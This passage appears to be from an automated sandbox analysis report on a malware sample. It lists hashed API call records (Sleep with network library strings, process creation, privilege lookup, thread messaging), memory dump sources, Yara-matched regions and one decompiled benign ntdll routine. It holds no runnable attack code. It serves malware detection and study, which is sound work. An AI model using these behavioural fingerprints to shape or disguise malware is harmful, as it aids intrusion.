                                                                                      • Opcode Fuzzy Hash: 31718dc635ed0f4fd56509f525015eef95265a36728f9783c2e0ef4ffec781f7
                                                                                      • Instruction Fuzzy Hash: 4B90027124108806F2106199840474A0055A7D0345F55C425A4419698D86D5D8957161
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: a28d6cbb130c2d7263263b4b4c833d70551138b2a1bcf29dab0544e61ee11b5d
                                                                                      • Instruction ID: f2e595af8c505617cc095e5d39bef766ce82896f4bba42816b9ef8489f17c0c8
                                                                                      • Opcode Fuzzy Hash: a28d6cbb130c2d7263263b4b4c833d70551138b2a1bcf29dab0544e61ee11b5d
                                                                                      • Instruction Fuzzy Hash: 0F90027124100406F20065D954086460055A7E0345F51D025A5019595EC6A5D8957171
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c0dae682607209a9f746f7445fe0e2029a13c86504d18189fe76ebd3b05dbde4
                                                                                      • Instruction ID: ffc7f0b7979d489648709c8b0ca263e3ed57c6378cbf9e5cf10aa99de37d3349
                                                                                      • Opcode Fuzzy Hash: c0dae682607209a9f746f7445fe0e2029a13c86504d18189fe76ebd3b05dbde4
                                                                                      • Instruction Fuzzy Hash: 8090027135114406F210619984047060055A7D1245F51C425A0819598D86D5D8957162
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: e7ef172982041b9e3ff88dc36a1b2e4686901b7ea6cc1b8da9e53bcc35456c99
                                                                                      • Instruction ID: 5913065260bf0483a8c7d710ec953102a4446c7753b7b7f7bb2387c315dee4f5
                                                                                      • Opcode Fuzzy Hash: e7ef172982041b9e3ff88dc36a1b2e4686901b7ea6cc1b8da9e53bcc35456c99
                                                                                      • Instruction Fuzzy Hash: 8590026925300006F2807199540860A0055A7D1246F91D429A000A598CC955D86D7361
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7b96a5ecea05c9cf571ff62eb07d90113d8a152a26a528105d73ef352490c245
                                                                                      • Instruction ID: d98985595fcc9854491c0d8fccc40fc2125b763bd8d301987c04a6f94cd9abe2
                                                                                      • Opcode Fuzzy Hash: 7b96a5ecea05c9cf571ff62eb07d90113d8a152a26a528105d73ef352490c245
                                                                                      • Instruction Fuzzy Hash: 58900261282041567645B19944045074056B7E0285791C026A1409990C8566E85AF661
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 9a3b03e8c58f847957f44829c2376af9f93ca63ee2d10600c22f45964fe924d4
                                                                                      • Instruction ID: 2072fe16823af285e3ef7bd42e6d9f3a1fb0838715714877b9e0ca1d75590af5
                                                                                      • Opcode Fuzzy Hash: 9a3b03e8c58f847957f44829c2376af9f93ca63ee2d10600c22f45964fe924d4
                                                                                      • Instruction Fuzzy Hash: AF90027124100417F211619945047070059A7D0285F91C426A0419598D9696D956B161
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2606b88290f6c3bf68f7e1c5391df9476dc4049e66e95261dca8ed5c918bfac2
                                                                                      • Instruction ID: e190250303336ab40fc77e65b3c46c21f23f2255518c08b873bf9d63c2e041a2
                                                                                      • Opcode Fuzzy Hash: 2606b88290f6c3bf68f7e1c5391df9476dc4049e66e95261dca8ed5c918bfac2
                                                                                      • Instruction Fuzzy Hash: 569002B124100406F240719944047460055A7D0345F51C025A5059594E8699DDD976A5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 97cb8c9cd8fdd16761378b1738678a87fe2bdcf098f6a781356227ec2afdd2ce
                                                                                      • Instruction ID: b7e137fafebadf97141d97b46c94e11584bdc05a9c7673211be42a788c01364c
                                                                                      • Opcode Fuzzy Hash: 97cb8c9cd8fdd16761378b1738678a87fe2bdcf098f6a781356227ec2afdd2ce
                                                                                      • Instruction Fuzzy Hash: 6E9002A138100446F20061994414B060055E7E1345F51C029E1059594D8659DC567166
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: e4751826996e024dbeeccb1baa5f5b26f4aaf69e2e0896e421c1a84aa19d0b5f
                                                                                      • Instruction ID: 48dbb6b46937930662e4834ace3086151af972d97a111027a6e5f806e0337c62
                                                                                      • Opcode Fuzzy Hash: e4751826996e024dbeeccb1baa5f5b26f4aaf69e2e0896e421c1a84aa19d0b5f
                                                                                      • Instruction Fuzzy Hash: 0790026125180046F30065A94C14B070055A7D0347F51C129A0149594CC955D8657561
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02CD6F78
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID: net.dll$wininet.dll
                                                                                      • API String ID: 3472027048-1269752229
                                                                                      • Opcode ID: c9b3c6663157e16197c6f84555faca932412816185e5914e14cb4e0ab3cdbe2e
                                                                                      • Instruction ID: 6f8a534de01986c0d9e940b02f82fcf457da2e2a7455fc8be48b8d336f8e21e4
                                                                                      • Opcode Fuzzy Hash: c9b3c6663157e16197c6f84555faca932412816185e5914e14cb4e0ab3cdbe2e
                                                                                      • Instruction Fuzzy Hash: AE317EB5601704BBC725DFA8D8A0FA7BBB9EB88700F10841DF65A9B241D731B545CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02CD6F78
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID: net.dll$wininet.dll
                                                                                      • API String ID: 3472027048-1269752229
                                                                                      • Opcode ID: 96e3b3f9513e456051d8a33696c94b743ed5aad4bc3e1a11ba64bc6c1ec742f9
                                                                                      • Instruction ID: cb30565ebd87217d54b2c9735270262f16561bdbbfabfde7ae0fd8f4161bb651
                                                                                      • Opcode Fuzzy Hash: 96e3b3f9513e456051d8a33696c94b743ed5aad4bc3e1a11ba64bc6c1ec742f9
                                                                                      • Instruction Fuzzy Hash: 3D21A0B5601704BBD710EFA8D8A1FA7BBB9EF88704F10841DF619AB241D371E945CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02CC3B93), ref: 02CD84ED
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID: .z`
                                                                                      • API String ID: 3298025750-1441809116
                                                                                      • Opcode ID: 2761205a35dc051a859ddbd3f81c910fb9ab3040867dd034cc3d9f8bbbe7a0cf
                                                                                      • Instruction ID: 7031146e2610a09d6007868bf811eb4283ef35db87168a9bb7d006e58d9153ee
                                                                                      • Opcode Fuzzy Hash: 2761205a35dc051a859ddbd3f81c910fb9ab3040867dd034cc3d9f8bbbe7a0cf
                                                                                      • Instruction Fuzzy Hash: D4F030716002046FDB24DFA5CC85EE73769EF44750F104659FA099B291C632E815CAA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02CC3B93), ref: 02CD84ED
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID: .z`
                                                                                      • API String ID: 3298025750-1441809116
                                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                      • Instruction ID: 976213b43040cf034992daa5cddd46cd284099cd726d696781062038dbc5dc5f
                                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                      • Instruction Fuzzy Hash: 75E01AB12002046BDB14DF59CC44EA777ADAF88750F014554BA0857241C630F9108AF0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02CC72BA
                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02CC72DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID:
                                                                                      • API String ID: 1836367815-0
                                                                                      • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                                      • Instruction ID: decb32c13f08ecb553d10812e7b043196eddab4c3e7160c594de17239afbc39b
                                                                                      • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                                      • Instruction Fuzzy Hash: 5B01DB31A80328B7E720A6949C02FFF776C9F40B50F140159FF04BA1C1E6A47A069BF5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02CC9B82
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Load
                                                                                      • String ID:
                                                                                      • API String ID: 2234796835-0
                                                                                      • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                      • Instruction ID: f8df56d013eebd291b746a65d27ecfd5cf98dc06b6737f680720a8c03455b882
                                                                                      • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                      • Instruction Fuzzy Hash: 9B0121B5D4020DBBDF10EBE4DC41FADB3B99B54308F104199EA0897240F671EB14DB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02CD8584
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateInternalProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2186235152-0
                                                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                      • Instruction ID: 6c7858463be450349183cb229f79f18469020557abe99f01e19afac585384650
                                                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                      • Instruction Fuzzy Hash: A2015FB2214108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97251D630E851CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02CD8584
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateInternalProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2186235152-0
                                                                                      • Opcode ID: 6192752af80ed6943e8f37135ff11c23ac0442bf9fab496d9bc96c6b95e55c38
                                                                                      • Instruction ID: 288a75853f2213cd482ad69d619fac0cf7f734b09db27144a74149a863be62c8
                                                                                      • Opcode Fuzzy Hash: 6192752af80ed6943e8f37135ff11c23ac0442bf9fab496d9bc96c6b95e55c38
                                                                                      • Instruction Fuzzy Hash: 0901B2B2215149AFCB44DF98DC80DEB77BDAF8C314F15825DFA4997251C630E851CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02CCCCC0,?,?), ref: 02CD703C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2422867632-0
                                                                                      • Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                      • Instruction ID: a1b1a912ab01077203c03ad8100404eb8b62dfbae4d64a5b3db41eac8a907048
                                                                                      • Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                      • Instruction Fuzzy Hash: 2AE092333803043AE33065A9AC02FA7B39DCB81B34F54002AFB0DEB2C0D595F90146E9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02CCCF92,02CCCF92,?,00000000,?,?), ref: 02CD8650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LookupPrivilegeValue
                                                                                      • String ID:
                                                                                      • API String ID: 3899507212-0
                                                                                      • Opcode ID: c399201017d67f79e7bd3e258753d3f73ea75e9c2f89b3c52010388a969d9e8b
                                                                                      • Instruction ID: 2ea7068d1a4c9dfe9f520801b6abcf1f64e4650264b731ef9548595162a944ef
                                                                                      • Opcode Fuzzy Hash: c399201017d67f79e7bd3e258753d3f73ea75e9c2f89b3c52010388a969d9e8b
                                                                                      • Instruction Fuzzy Hash: 6DE092B16452416BCB21DF158C44FD73B289F83210F048185FA485B242C430A815C7F0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02CCCF92,02CCCF92,?,00000000,?,?), ref: 02CD8650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LookupPrivilegeValue
                                                                                      • String ID:
                                                                                      • API String ID: 3899507212-0
                                                                                      • Opcode ID: 7e2a435b7d0d65e5e71ccb4e4a6c98b3de9d1ec049006f848a61d2e41d617f8c
                                                                                      • Instruction ID: 57067cb029ba9ddeedf2ed4d742217a138b0bbab66db13910f93edf7b2f422df
                                                                                      • Opcode Fuzzy Hash: 7e2a435b7d0d65e5e71ccb4e4a6c98b3de9d1ec049006f848a61d2e41d617f8c
                                                                                      • Instruction Fuzzy Hash: 98E01AB16002186BDB10DF84CC84EEB37A9AF89650F118555FA09AB241CA34E9118BF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02CCCF92,02CCCF92,?,00000000,?,?), ref: 02CD8650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LookupPrivilegeValue
                                                                                      • String ID:
                                                                                      • API String ID: 3899507212-0
                                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                      • Instruction ID: 26ba9d49d6a090a6ce64ebe4036c74d513a066369005ee865fa94cdf9d59ba62
                                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                      • Instruction Fuzzy Hash: 42E01AB12002086BDB10DF49CC84EE737ADAF88650F018154BA0857241C930F8118BF5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(02CD3506,?,02CD3C7F,02CD3C7F,?,02CD3506,?,?,?,?,?,00000000,00000000,?), ref: 02CD84AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                      • Instruction ID: 3b6f14ed543d943c4e714eebe45238094741b7c044530e21571b339c901d3a5d
                                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                      • Instruction Fuzzy Hash: 4AE012B1200208ABDB14EF99CC40EA777ADAF88650F118558BA085B281CA30F9118AF0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02CC7C63,?), ref: 02CCD42B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: e132cc5c67d8f3e06054d9207e43b9f2c31c91a04b01ce519a46e664084f44e8
                                                                                      • Instruction ID: 4310a2bb6dabc50b031083aab8b5989831bf82c9efe218d5d99cddedad163f97
                                                                                      • Opcode Fuzzy Hash: e132cc5c67d8f3e06054d9207e43b9f2c31c91a04b01ce519a46e664084f44e8
                                                                                      • Instruction Fuzzy Hash: 6EE072E2AA82802AE711FB70DC03F133B105F02200F0A09E8ED8AAB0C3DA44D0048225
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02CC7C63,?), ref: 02CCD42B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                      • Instruction ID: 0cdeac2303e69d6d9b84f2828562d3786b1935c6a194b131b16306971f1d01e4
                                                                                      • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                      • Instruction Fuzzy Hash: B6D0A7757903043BE610FBA49C03F2732CD9B44B04F494074FA49D73C3DA60F5004565
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02CC72DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID:
                                                                                      • API String ID: 1836367815-0
                                                                                      • Opcode ID: 72f7ce76a225be9e7fe222d8e15dd08ea745f397f5f2f9abea3d6d482fad5af6
                                                                                      • Instruction ID: 7492c785a4e2dfc0bb4d87746af980d396fc95e7526d92f8d3e173d8cd604b5b
                                                                                      • Opcode Fuzzy Hash: 72f7ce76a225be9e7fe222d8e15dd08ea745f397f5f2f9abea3d6d482fad5af6
                                                                                      • Instruction Fuzzy Hash: 95C08C26B2528C80C222257978105F8F728C789C32A200AEBD9A4415421952022D9A80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 669a077ea404a5cc62ba2e4d12ec5b630d7875795d1be5b7b8ee8486d0e72e9c
                                                                                      • Instruction ID: c223a602d24a54ffa3bc84c67c4bab80d3b6e3873575d636cede2336060da920
                                                                                      • Opcode Fuzzy Hash: 669a077ea404a5cc62ba2e4d12ec5b630d7875795d1be5b7b8ee8486d0e72e9c
                                                                                      • Instruction Fuzzy Hash: E5B092B29424C5CAFB11EBA05A08B6B7A50BBD0745F26C066E2424681A4778E095F6F6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      C-Code - Quality: 53%
                                                                                      			E0460FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                      				void* _t7;
                                                                                      				intOrPtr _t9;
                                                                                      				intOrPtr _t10;
                                                                                      				intOrPtr* _t12;
                                                                                      				intOrPtr* _t13;
                                                                                      				intOrPtr _t14;
                                                                                      				intOrPtr* _t15;
                                                                                      
                                                                                      				_t13 = __edx;
                                                                                      				_push(_a4);
                                                                                      				_t14 =  *[fs:0x18];
                                                                                      				_t15 = _t12;
                                                                                      				_t7 = E045BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                      				_push(_t13);
                                                                                      				E04605720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                      				_t9 =  *_t15;
                                                                                      				if(_t9 == 0xffffffff) {
                                                                                      					_t10 = 0;
                                                                                      				} else {
                                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                      				}
                                                                                      				_push(_t10);
                                                                                      				_push(_t15);
                                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                      				return E04605720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                      			}











                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0460FDFA
                                                                                      Strings
                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0460FE2B
                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0460FE01
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                      • Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                      • API String ID: 885266447-3903918235
                                                                                      • Opcode ID: 228c1f6c84291129605cbde09808ae3ddbd68abdf9c94290dafcc4798ebb2164
                                                                                      • Instruction ID: 509f9258ec2813d9f5331c1b1c303777cd70a20c148df4b84d78332f6d47aa85
                                                                                      • Opcode Fuzzy Hash: 228c1f6c84291129605cbde09808ae3ddbd68abdf9c94290dafcc4798ebb2164
                                                                                      • Instruction Fuzzy Hash: AFF0F632200201BFE6291A45DC06F23BB5AEB44730F144318F628561E1EAA2FC20EAF8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%